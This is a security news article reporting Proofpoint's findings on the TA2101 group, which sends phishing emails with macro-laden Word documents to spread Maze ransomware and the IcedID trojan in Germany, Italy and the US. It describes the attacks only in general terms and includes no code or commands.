Thursday, March 28, 2024

New Hacking Group Using Metasploit To Install Backdoor Malware On Windows By Exploiting MS Office

Researchers detect a wave of malware campaigns from a new hacking group named TA2101 that targeting various organizations in German and Italy to deploy the backdoor malware in their network.

Threat actors from this new hacking group using legitimate and licensed penetration testing tools and backdoor framework such as Cobalt Strike and Metasploit to perform the post-exploitation operation.

These kinds of tools and frameworks are legitimately used by an organization to find out the vulnerabilities and secure their environment, at the same time cybercriminals group such as Cobalt Group, APT32, and APT19 taking advantage of the features and used it to deploy the malware.

Attackers initiate these campaigns focused on phishing and increasingly sophisticated social engineering, as well as banking Trojans and ransomware. 

Researchers observed that this New Hacking Group also distributing Maze ransomware to attack Italy based company’s infrastructure by employing an advanced social engineering technique and impersonate the Italian revenue agency.

Exploiting Windows via Malicious Word Docs

Proofpoint researchers observed this campaign from October 16 until November 12, 2019, the collected samples provide a clear indication about the targets, and how they are sending malicious email messages to organizations in Germany, Italy, United States to attack business and IT services, manufacturing, and healthcare.

Among the several samples that were delivered via malspam emails, most of the email attachment contains weaponized word documents.

Email body content tempts victims to open the attachment that leads to executing the macro and turn it on to execute the PowerShell script.

The obfuscated Powershell script eventually downloads and installs the Maze ransomware from the command & control server and drops into the victim’s device.

Attackers delivering the ransomware via different email campaigns that pointed to the law enforcement activities, impersonating the German Federal Ministry of Finance, tempt victims to avoid further tax assessment and penalties.

In the very recent campaign, Proofpoint researchers observed thousands of emails attempting to deliver malicious Microsoft Word attachments with English lures, this time impersonating the United States Postal Service (USPS) and distributing the IcedID banking Trojan.

Same Weaponised word document used for this campaign, once executed, it installs the IcedID payload onto the targets mainly Healthcare vertical, using the same infection chain.

“Researchers also Observed a consistent set of TTPs (Tactics, Techniques, and Procedures) that allows attribution of these campaigns to a single actor with high confidence. These include the use of .icu domains, as well as identical email addresses for the Start of Authority (SOA) resource records stored for the DNS entries for the domains used in these campaigns”, Proof point said.

You can find the complete analysis and indicators of compromise here to secure your environment.

You can follow us on Linkedin, Twitter, Facebook for daily Cybersecurity and hacking news updates.

Website

Latest articles

Wireshark 4.2.4 Released: What’s New!

Wireshark stands as the undisputed leader, offering unparalleled tools for troubleshooting, analysis, development, and...

Zoom Unveils AI-Powered All-In-One AI Work Workplace

Zoom has taken a monumental leap forward by introducing Zoom Workplace, an all-encompassing AI-powered...

iPhone Users Beware! Darcula Phishing Service Attacking Via iMessage

Phishing allows hackers to exploit human vulnerabilities and trick users into revealing sensitive information...

2 Chrome Zero-Days Exploited at Pwn2Own 2024: Patch Now

Google has announced a crucial update to its Chrome browser, addressing several vulnerabilities, including...

The Moon Malware Hacked 6,000 ASUS Routers in 72hours to Use for Proxy

Black Lotus Labs discovered a multi-year campaign by TheMoon malware targeting vulnerable routers and...

Hackers Actively Exploiting Ray AI Framework Flaw to Hack Thousands of Servers

A critical vulnerability in Ray, an open-source AI framework that is widely utilized across...
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Mitigating Vulnerability Types & 0-day Threats

Mitigating Vulnerability & 0-day Threats

Alert Fatigue that helps no one as security teams need to triage 100s of vulnerabilities.

  • The problem of vulnerability fatigue today
  • Difference between CVSS-specific vulnerability vs risk-based vulnerability
  • Evaluating vulnerabilities based on the business impact/risk
  • Automation to reduce alert fatigue and enhance security posture significantly

Related Articles